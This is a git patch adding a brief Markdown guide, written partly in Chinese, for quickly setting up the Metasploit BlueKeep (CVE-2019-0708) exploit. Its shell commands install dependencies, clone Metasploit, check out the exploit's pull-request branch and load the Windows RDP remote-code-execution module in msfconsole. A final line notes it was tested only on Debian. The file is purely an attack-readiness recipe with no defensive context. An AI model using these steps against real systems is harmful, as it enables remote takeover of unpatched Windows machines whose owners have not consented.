From d4a32d8d1ad02a98ef1eda8d2d1442cbb2d92891 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=B8=9C=E6=96=B9=E6=9C=89=E9=B1=BC=E5=90=8D=E4=B8=BA?= =?UTF-8?q?=E5=92=B8?= Date: Sun, 15 Sep 2019 14:41:34 +0800 Subject: [PATCH] =?UTF-8?q?Create=20cve-2019-0708-msf=E5=BF=AB=E9=80=9F?= =?UTF-8?q?=E6=90=AD=E5=BB=BA.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve-2019-0708-msf快速搭建.md | 11 +++++++++++ 1 file changed, 11 insertions(+) create mode 100644 cve-2019-0708-msf快速搭建.md diff --git a/cve-2019-0708-msf快速搭建.md b/cve-2019-0708-msf快速搭建.md new file mode 100644 index 0000000..82e6b19 --- /dev/null +++ b/cve-2019-0708-msf快速搭建.md @@ -0,0 +1,11 @@ +```shell +sudo apt-get install libsqlite3-dev libpq-dev libpcap-dev -y +git clone https://github.com/rapid7/metasploit-framework.git +cd metasploit-framework +git fetch origin pull/12283/head:bluekeep +git checkout bluekeep +sudo gem install bundler && bundle +./msfconsole +msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce +``` +> 仅在Debian测试过